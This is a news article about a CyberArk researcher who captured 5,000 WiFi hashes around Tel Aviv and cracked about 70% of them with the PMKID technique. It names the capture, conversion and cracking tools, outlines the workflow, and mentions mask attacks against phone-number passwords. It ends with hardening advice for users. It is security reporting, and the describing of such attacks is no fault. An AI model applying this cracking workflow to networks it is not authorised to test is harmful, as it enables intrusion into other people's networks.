A security researcher from CyberArk has vividly demonstrated the consequences of lax home network security by conducting a personal, city-wide experiment. The experiment was aided by a powerful ‘cracking’ rig at CyberArk Labs coupled with a novel cracking technique. In an article published on October 26th, 2021 on the CyberArk portal, security researcher Ido Hoorvitch wrote, “How I Cracked 70% of Tel Aviv’s Wifi Networks (from a Sample of 5,000 Gathered WiFi).”
According to the article, the spark that drove Hoorvitch to conduct this experiment was the combination of his experience and, “a relatively new WiFi attack” that he could try out in addition to the presence of his “new monster cracking rig (8x QUADRO RTX 8000 48GB GPUs.)” “WiFi is everywhere because connectivity is more important than ever”, Hoorvitch added. The experiment Hoorvitch conducted would more than justify his hunches that securing home networks is as important as ever, “With the continued shift to remote work due to the pandemic.”
Ido Hoorvitch’s Experiment
In order to translate his initial hunches into real-world results, Hoorvitch set off to collect available WiFi signals around Tel Aviv, Israel that are emitted by common WiFi routers used by home users and businesses all over the world. Hoorvitch then managed to gather 5,000 network hashes by scanning the city streets on foot with, “WiFi sniffing equipment.” Once the gathering was complete, Hoorvitch went on to try to crack what he found.
The distinguishing factor for Hoorvitch’s approach was that he was using a non-traditional method of WiFi ‘cracking’, which he had access to thanks to Hashcat lead developer Jens “atom” Steube’s “groundbreaking” research. Steube calls this, “a new technique to crack WPA PSK (Pre-Shared Key) passwords.”
WiFi Cracking Eureka
Steube’s new technique, “exposed a new vulnerability targeting RSN IE (Robust Security Network Information Element) to retrieve a PMKID hash.” The technique renders the classical process of capturing user login information while being connected to the network obsolete and, “only requires the attacker to capture a single frame and eliminate wrong passwords and malformed frames that are disturbing the cracking process.”
Hoorvitch’s experiment was a great success, “we cracked more than 3,500 WiFi networks in and around Tel Aviv – 70% of our sample.” Furthermore, “We chose to start with what’s called a “mask attack,” due to the terrible habit many people living in Israel have of using their cellphone numbers as WiFi passwords” he added. A mask attack is similar to a brute-force attack, however, it is much more efficient.
The revolutionary cracking process requires versions 4.2.0 or higher of the; hcxdumptool, and hashcat tools. A conversion tool like hcxpcaptool is also required. Hcxdumptool initially captures WLAN traffic (WiFi signal), followed by conversion and finally cracking via hashcat. These tools are publicly available -included in ‘atom’ (Steube’s) post on the Hashcat portal and user ZerBea’s Github repository.
Steube added that, “This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard.” Steube also stated that this specific technique would not be as effective when applied to routers equipped with the new WPA3 standard.
Which Routers Are Vulnerable?
According to Steube, “At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).”
Important Cybersecurity Takeaways
Hoorvitch added in his conclusion that this groundbreaking experiment is all the proof needed to show that, “greater attention must be paid to protecting oneself.” The dangers of a WiFi network breach include scenarios such as; man-in-the-middle attacks, lateral cybercriminal movement, cybercriminal network hopping, and other attack vectors.
Hoorvitch went on to list some helpful security recommendations that will protect users against this breach;
- Using a password that includes symbols and digits which is a minimum of 10 characters long
- Changing the default password and username of the router
- Updating router firmware to the latest release
- Disabling WPS
- Changing the encryption protocol to WPA2, if WPA3 is not available